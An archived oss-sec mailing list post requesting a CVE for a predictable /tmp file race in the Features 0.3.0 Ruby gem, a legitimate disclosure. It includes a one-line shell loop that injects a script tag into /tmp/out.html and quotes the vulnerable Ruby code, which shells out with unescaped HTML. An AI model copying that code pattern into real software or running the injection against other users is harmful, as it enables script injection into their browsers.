oss-sec mailing list archives
Features 0.3.0 Ruby gem /tmp file injection vulnerability
From: "Larry W. Cashdollar" <larry0 () me com>
Date: Mon, 09 Sep 2013 17:38:46 +0000 (GMT)
Hi, May I have a CVE for the following vulnerability? Title: Features 0.3.0 Ruby gem /tmp file injection vulnerability Date: 9/1/2013 Author: Larry W. Cashdollar @_larry0 Download: http://rubygems.org/gems/features CVE: TBD Description: "Plaintext User Stories Parser supporting native programming languages. Especially Objective-C" Same vulnerability as http://vapid.dhs.org/advisories/show_in_browser.html By a malicious user creating /tmp/out.html first and repeatedly writing to it they can inject malicious html into the file right before it is about to be opened. PoC: nobody () sp0rk:/$ while (true); do echo "<script> alert('Hello'); </script>" >> /tmp/out.html; done Will pop up a java script alert in other gem users browser. Code: Vulnerabile code in ./features-0.3.0/lib/suite.rb html = parse_results(results).html %x(touch '/tmp/out.html' && echo '#{html}' > /tmp/out.html && open '/tmp/out.html' ) end def parse_results_and_open_in_safari(results) -- end def open_in_safari(html) %x(touch '/tmp/out.html' && echo '#{html}' > /tmp/out.html && open '/tmp/out.html' ) end Vendor: Not notified
Current thread:
- Features 0.3.0 Ruby gem /tmp file injection vulnerability Larry W. Cashdollar (Sep 09)
- Re: Features 0.3.0 Ruby gem /tmp file injection vulnerability Kurt Seifried (Sep 09)
- Re: Features 0.3.0 Ruby gem /tmp file injection vulnerability Henri Salo (Sep 10)
- <Possible follow-ups>
- Re: Features 0.3.0 Ruby gem /tmp file injection vulnerability Larry W. Cashdollar (Sep 10)